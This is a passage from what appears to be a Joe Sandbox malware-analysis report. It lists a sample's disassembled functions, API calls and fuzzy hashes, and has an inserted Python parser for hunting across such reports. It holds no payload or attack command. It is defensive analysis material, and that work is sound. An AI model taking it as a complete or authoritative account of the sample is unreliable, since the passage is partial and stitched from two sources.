                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: BitmapCreateFromGdipStream
                                                                                              • String ID:
                                                                                              • API String ID: 1918208029-0
                                                                                              • Opcode ID: 0c489961e76aded5db2a2c5d7d4f2ebeb5982a5be946a34620b4aa38f016408d
                                                                                              • Instruction ID: 0219a41bbf4d75b281c18b45d370870614affd6c95e4fb0f1ee1528f4884611c
                                                                                              • Opcode Fuzzy Hash: 0c489961e76aded5db2a2c5d7d4f2ebeb5982a5be946a34620b4aa38f016408d
                                                                                              • Instruction Fuzzy Hash: 89E0ED71910618EFCB10DF99C545699B7F8EF08355F20806AF99597600E374AE449BA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A43D3A
                                                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00A43D45
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                              • String ID:
                                                                                              • API String ID: 1660781231-0
                                                                                              • Opcode ID: 1f6a4c5d5f769eff160a2e7744c07ae1026c1c0efaa8b1cec086441fe3b74b98
                                                                                              • Instruction ID: e58d2c20b9fbbbc8848859b2d9c5956eb3d180019ccb6a1fb44545fe48d26182
                                                                                              • Opcode Fuzzy Hash: 1f6a4c5d5f769eff160a2e7744c07ae1026c1c0efaa8b1cec086441fe3b74b98
                                                                                              • Instruction Fuzzy Hash: DFD0223FC08B02349C0833B82E0398B1364BAE5B707B01F86E0309A0C1EE188A056121
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemShowWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3351165006-0
                                                                                              • Opcode ID: 74c07520c37e512be21eb13000a05e14a24848f84aaf1ce0fdba9acdc7ad9875
                                                                                              • Instruction ID: 8fed9078b5562156c66f3303dade6a598f3f2a2b00f42fe4f3f6743404793fd9
                                                                                              • Opcode Fuzzy Hash: 74c07520c37e512be21eb13000a05e14a24848f84aaf1ce0fdba9acdc7ad9875
                                                                                              • Instruction Fuzzy Hash: 37C01236858A00BECB01ABF0DC0DE2ABBA8EBA4212F10CA08F4A6C1060C239C020DB11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,?), ref: 00A212C1
                                                                                              • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00A212C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherItemUser
                                                                                              • String ID:
                                                                                              • API String ID: 4250310104-0
                                                                                              • Opcode ID: 9e0c9b4a310f3bb6b5aafc8338e8e2d9a28c2d06a886e185b50ebe85bdba894c
                                                                                              • Instruction ID: 4b9972c91578f20225ddff35283059354febf2b689a6f9f33129b898f29d6a4c
                                                                                              • Opcode Fuzzy Hash: 9e0c9b4a310f3bb6b5aafc8338e8e2d9a28c2d06a886e185b50ebe85bdba894c
                                                                                              • Instruction Fuzzy Hash: 98C04C76808640BFCB01ABF49D0CD2FBFB9AB94311F50CA09B5A581024C6358411DF11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 0d8adfc7d4a9cb510d778e0e4ec541c813c34d75a4804355b211f7a00dc9a863
                                                                                              • Instruction ID: cd26c3088d8ca99241d1c8dd200762d504c65d3a5de2d9f6d112c2b92b4103fe
                                                                                              • Opcode Fuzzy Hash: 0d8adfc7d4a9cb510d778e0e4ec541c813c34d75a4804355b211f7a00dc9a863
                                                                                              • Instruction Fuzzy Hash: 42C1A274A043649FDF25CF2CD9847AD7BA5AF6A310F1801BAEC059B296CB349E44CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%
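The entries in this listing are regular enough to parse instead of reading by hand. The following Python is added here as an example and is not part of the Joe Sandbox report or its tooling: it reads entries in exactly the shape shown above (the APIs list with its "Part of subcall function" lines, the Similarity IDs, the Uniqueness Score) into records and answers the questions a hunter asks of such a dump: which functions call a given module or API, which DLL names are passed literally to LoadLibrary*, how often each API appears, and an index by Instruction Fuzzy Hash for pivoting to other reports. The sample input is constructed from three entries in this section with the repeated "Associated:" dump lines left out; the fuzzy-hash algorithm itself is Joe Sandbox's and is not reimplemented.

```python
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: three function entries copied from the report above,
# with the repeated "Associated:" dump lines left out (the parser skips them).
SAMPLE = """\
APIs
• GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A31B56
• LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A3063A,Crypt32.dll,00000000,00A306B4,00000200,?,00A30697,00000000,00000000,?), ref: 00A31B78
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Similarity
• API ID: DirectoryLibraryLoadSystem
• String ID:
• API String ID: 1175261203-0
• Instruction Fuzzy Hash: ADE048769103286BDB119BE5DD04FDA77ACFF0D3C2F0400657645D2048DA74DA84CBB0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetFileAttributesW.KERNELBASE(?,?,?,00A2B4CA,?,00A28042,?), ref: 00A2B4E4
  • Part of subcall function 00A2CF32: _wcslen.LIBCMT ref: 00A2CF56
• GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,00A2B4CA,?,00A28042,?), ref: 00A2B510
Similarity
• API ID: AttributesFile$_wcslen
• String ID:
• API String ID: 2673547680-0
• Instruction Fuzzy Hash: 2AE092315103686BDB20EB68EC04BDA7758BB093E6F000170FE46E71E5D774AD818AE0
Uniqueness

Uniqueness Score: -1.00%

APIs
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Instruction Fuzzy Hash: 42C1A274A043649FDF25CF2CD9847AD7BA5AF6A310F1801BAEC059B296CB349E44CB61
Uniqueness

Uniqueness Score: -1.00%
"""

# One API line: optional "Part of subcall function <addr>:", then Name.MODULE(args), ref: <addr>.
# The argument list is optional because LIBCMT/LIBVCRUNTIME entries have none.
API_RE = re.compile(
    r"^\s*•\s+(?:Part of subcall function (?P<sub>[0-9A-F]+):\s+)?"
    r"(?P<name>[A-Za-z_][\w@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
FIELD_RE = re.compile(r"^\s*•\s+(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(?P<score>-?[\d.]+)%")


@dataclass
class ApiCall:
    module: str                     # e.g. KERNELBASE, LIBCMT
    name: str                       # e.g. LoadLibraryW
    ref: str                        # call-site address in the dump
    args: List[str]                 # as reported; "?" means unresolved
    subcall: Optional[str] = None   # callee address when listed as a subcall


@dataclass
class FunctionEntry:
    apis: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)  # Similarity IDs, dump metadata
    uniqueness: Optional[float] = None


def parse_report(text: str) -> List[FunctionEntry]:
    """Split the listing into entries: each starts at 'APIs' and ends at 'Uniqueness Score'."""
    entries: List[FunctionEntry] = []
    current: Optional[FunctionEntry] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionEntry()
            entries.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(raw)
        if m:
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            current.apis.append(ApiCall(m["module"], m["name"], m["ref"], args, m["sub"]))
            continue
        m = SCORE_RE.match(line)
        if m:
            current.uniqueness = float(m["score"])
            current = None          # entry closed; wait for the next "APIs" header
            continue
        m = FIELD_RE.match(raw)
        if m:
            current.fields[m["key"].strip()] = m["val"].strip()
    return entries


def api_histogram(entries: List[FunctionEntry]) -> Counter:
    """How often each API name is called across all entries (subcalls included)."""
    return Counter(c.name for e in entries for c in e.apis)


def loaded_libraries(entries: List[FunctionEntry]) -> set:
    """DLL names passed literally to any LoadLibrary* call (Crypt32.dll in the sample)."""
    return {a for e in entries for c in e.apis if c.name.startswith("LoadLibrary")
            for a in c.args if a.lower().endswith(".dll")}


def find_by_api(entries: List[FunctionEntry], module: Optional[str] = None,
                name: Optional[str] = None) -> List[int]:
    """Indices of entries that call the given module and/or API name."""
    return [i for i, e in enumerate(entries)
            if any((module is None or c.module == module) and (name is None or c.name == name)
                   for c in e.apis)]


def index_by_fuzzy_hash(entries: List[FunctionEntry]) -> Dict[str, FunctionEntry]:
    """Instruction Fuzzy Hash -> entry, the key to pivot on across other reports."""
    return {e.fields["Instruction Fuzzy Hash"]: e for e in entries
            if "Instruction Fuzzy Hash" in e.fields}
```

Running `loaded_libraries(parse_report(SAMPLE))` returns `{"Crypt32.dll"}`, surfacing the entry in which the report lists GetSystemDirectoryW immediately before LoadLibraryW; `find_by_api(entries, module="KERNEL32")` gives the same entry. Entries with an empty APIs list (the H_prolog functions) parse with no calls and keep their Similarity fields, so they still land in the fuzzy-hash index.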

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 2bc5333e62fb6c7e24bd8695ddca5861e7c4b305eeed804c9e8c0238390e12c7
                                                                                              • Instruction ID: 26024ded9de415cd605c8570984a3f80057ce23a7a33fd4ae199f4a63ac951cc
                                                                                              • Opcode Fuzzy Hash: 2bc5333e62fb6c7e24bd8695ddca5861e7c4b305eeed804c9e8c0238390e12c7
                                                                                              • Instruction Fuzzy Hash: 5871B2B1504B959FCB25EB78E951AE7B7E8BF19300F04093EF1AB46181DB71BA44CB11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A290A7
                                                                                                • Part of subcall function 00A213F8: __EH_prolog.LIBCMT ref: 00A213FD
                                                                                                • Part of subcall function 00A22032: __EH_prolog.LIBCMT ref: 00A22037
                                                                                                • Part of subcall function 00A2B966: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00A2B991
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 2506663941-0
                                                                                              • Opcode ID: fe4b44629f080b104ebf72156f4a7878386bd72a357cb3648b9b4a89bd261ab5
                                                                                              • Instruction ID: ae6b7743ce3933387a40ef8b82362bf6d3b6f0837fb265b8e172e6e609ef234a
                                                                                              • Opcode Fuzzy Hash: fe4b44629f080b104ebf72156f4a7878386bd72a357cb3648b9b4a89bd261ab5
                                                                                              • Instruction Fuzzy Hash: 3741D631904274AEDB24DB68E9A5AEB73B9AF10740F4401FAF58A67083DB755F88CF10
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A213FD
                                                                                                • Part of subcall function 00A26891: __EH_prolog.LIBCMT ref: 00A26896
                                                                                                • Part of subcall function 00A2E298: __EH_prolog.LIBCMT ref: 00A2E29D
                                                                                                • Part of subcall function 00A2644D: __EH_prolog.LIBCMT ref: 00A26452
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 1f8073ac08535f4c8cbe05df800e5e5d03800783e0b9785d93118aab4938c689
                                                                                              • Instruction ID: 1625cb7362fa24d4d856c8b3aa6b8bc5d6650ffe0bde38b1ce1ae334060f03a9
                                                                                              • Opcode Fuzzy Hash: 1f8073ac08535f4c8cbe05df800e5e5d03800783e0b9785d93118aab4938c689
                                                                                              • Instruction Fuzzy Hash: 5E5145B19063808ECB14DF2995C02D9BBE6AF69300F1802BEEC5DCF68BD7750654CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A213FD
                                                                                                • Part of subcall function 00A26891: __EH_prolog.LIBCMT ref: 00A26896
                                                                                                • Part of subcall function 00A2E298: __EH_prolog.LIBCMT ref: 00A2E29D
                                                                                                • Part of subcall function 00A2644D: __EH_prolog.LIBCMT ref: 00A26452
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 8d2c25aecc8d6322a932314d23fd1c35cc38d4bdbc7572e34f733bcbca153b97
                                                                                              • Instruction ID: 089d758bce9c92e256e940fd8de717559eb0a9971041cb784802e21efbc6d493
                                                                                              • Opcode Fuzzy Hash: 8d2c25aecc8d6322a932314d23fd1c35cc38d4bdbc7572e34f733bcbca153b97
                                                                                              • Instruction Fuzzy Hash: C25135B19063808ECB14DF6995C02D9BBE6AF69300F1802BEEC5DCF68BD7751654CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A3C21C
                                                                                                • Part of subcall function 00A213F8: __EH_prolog.LIBCMT ref: 00A213FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 279b5050b3e990a78dd871c297eb8f7e5249a98f76d16d2a649cffc8625c09b3
                                                                                              • Instruction ID: 8e96fd649fab8a7fbf24a33895ed8851c16c6422147a9295bb001299b504e940
                                                                                              • Opcode Fuzzy Hash: 279b5050b3e990a78dd871c297eb8f7e5249a98f76d16d2a649cffc8625c09b3
                                                                                              • Instruction Fuzzy Hash: 61219C75C04219AFCF15EFE8D941AEEB7B4BF54314F1000AAF805B7201D7756A45EB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00A4BEB8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc
                                                                                              • String ID:
                                                                                              • API String ID: 190572456-0
                                                                                              • Opcode ID: 2834e297254ff15ff241fcd271162c8609e915bf13b7d066a0ac416df3acd65c
                                                                                              • Instruction ID: dbb7833fd4fb32aacf3700ec77656790866cf38ac0585b25c08c6149e7c5cfea
                                                                                              • Opcode Fuzzy Hash: 2834e297254ff15ff241fcd271162c8609e915bf13b7d066a0ac416df3acd65c
                                                                                              • Instruction Fuzzy Hash: FA11C63BA105259F9B61DF6DDC428DB73B5EBC47207164220FE15AB254DB70EC4287E0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: b73b8f4222b197fc56ddfb59d8a285c73ba44499fdbe1135bc61a6f1bf7a05d4
                                                                                              • Instruction ID: 36bfc4b65ca97ddb0213dca2661dc743523eff09c1660a553cc0670fed5f4e84
                                                                                              • Opcode Fuzzy Hash: b73b8f4222b197fc56ddfb59d8a285c73ba44499fdbe1135bc61a6f1bf7a05d4
                                                                                              • Instruction Fuzzy Hash: CE11E032D006399BCB21FF6CE985AFEB375AF94700F01413AF815A7202DB74DC008A91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A2E29D
                                                                                                • Part of subcall function 00A26891: __EH_prolog.LIBCMT ref: 00A26896
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 3ced653e345e468c606b01bdbd87d01d33cc09d7b26f86ff2a05baab96bedcba
                                                                                              • Instruction ID: 6177f46dc5374e47d59f405c7725cdfa5063c409286bac42f51feec3cf98c2e8
                                                                                              • Opcode Fuzzy Hash: 3ced653e345e468c606b01bdbd87d01d33cc09d7b26f86ff2a05baab96bedcba
                                                                                              • Instruction Fuzzy Hash: 0111A071E05260DEDB14EBBDA6057AEBBE8AF44300F24407EA446D3382DF749E04C721
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A3EBA7
                                                                                                • Part of subcall function 00A31983: _wcslen.LIBCMT ref: 00A31999
                                                                                                • Part of subcall function 00A28823: __EH_prolog.LIBCMT ref: 00A28828
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2838827086-0
